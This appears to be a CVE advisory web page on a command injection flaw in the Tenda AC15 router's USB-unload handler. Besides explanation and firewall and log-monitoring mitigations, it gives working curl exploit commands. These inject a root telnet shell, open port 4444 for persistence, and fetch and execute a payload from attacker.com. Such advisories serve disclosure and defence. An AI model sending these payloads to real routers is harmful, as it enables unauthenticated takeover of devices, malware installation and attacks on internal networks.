Tenda AC15, Command Injection, CVE-2026-24105 (critical)

Listen to this Post

The vulnerability is located in the `goform/formsetUsbUnload` handler of the Tenda AC15 router firmware version V15.03.05.18_multi. This handler is responsible for managing the unloading of USB devices. The function retrieves a user-supplied parameter named `v1` from an HTTP POST request. This `v1` parameter is then used in string concatenation operations to build a command string that is subsequently passed to the `doSystemCmd()` function for execution. The firmware code fails to implement any sanitization or validation checks on the content of the `v1` parameter. Due to this lack of input validation, an attacker can inject arbitrary operating system commands by appending shell metacharacters (such as ;, &&, or |) to the expected value of v1. When the unsanitized string is passed to doSystemCmd(), the injected commands are executed on the underlying operating system with the same high privileges as the web server process, typically root. This allows for complete compromise of the device.

dailycve form:

Platform: Tenda AC15
Version: V15.03.05.18_multi
Vulnerability : Command Injection
Severity: Critical
date: 03/02/2026

Prediction: 2026-04-15

What Undercode Say:

Analytics:

Search for the vulnerable firmware binary
find / -name ".bin" 2>/dev/null | grep "AC15.V15.03.05.18_multi"
Check if the router's web interface is listening on port 80/443
nmap -p 80,443 <target_ip>
Use strings to find the vulnerable function and command call in the extracted firmware
strings usb_unload.so | grep -A 5 -B 5 "doSystemCmd"
strings usb_unload.so | grep "formsetUsbUnload"
Simulate the vulnerable parameter concatenation (conceptual)
v1_user_input=""; crafted_v1="ext4; telnetd -l /bin/sh;"
In vulnerable code: doSystemCmd("umount /dev/%s", crafted_v1);

Exploit:

Exploit using curl to inject a command that starts a telnet server
curl -X POST http://<router_ip>/goform/formsetUsbUnload \
-d "v1=ext4; telnetd -l /bin/sh;"
Inject command to add a firewall rule for persistence
curl -X POST http://<router_ip>/goform/formsetUsbUnload \
-d "v1=ext4; iptables -A INPUT -p tcp --dport 4444 -j ACCEPT;"
Inject command to download and execute a malicious payload
curl -X POST http://<router_ip>/goform/formsetUsbUnload \
-d "v1=ext4; wget http://attacker.com/malware -O /tmp/payload; chmod +x /tmp/payload; /tmp/payload;"

Protection from this CVE

Temporary workaround: Block access to the vulnerable endpoint via firewall
iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/formsetUsbUnload" --algo bm -j DROP
ip6tables -A INPUT -p tcp --dport 80 -m string --string "/goform/formsetUsbUnload" --algo bm -j DROP
Monitor logs for exploitation attempts
tail -f /var/log/httpd.log | grep "formsetUsbUnload.[;&|`$]"
Recommendation: Disable remote management if not needed
Check vendor website for official patch: https://www.tenda.com.cn/material/show/2710

Impact:

  • Remote Code Execution: Unauthenticated attackers on the network can execute arbitrary system commands.
  • Full Device Compromise: Commands run with root privileges, giving the attacker full control over the router.
  • Network Pivoting: The compromised router can be used as a foothold to attack other devices on the internal network.
  • Persistent Malware: Attackers can install persistent malware, turning the router into a bot for DDoS attacks or a proxy for malicious traffic.
  • Data Theft: All traffic passing through the router can be monitored, modified, or redirected.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top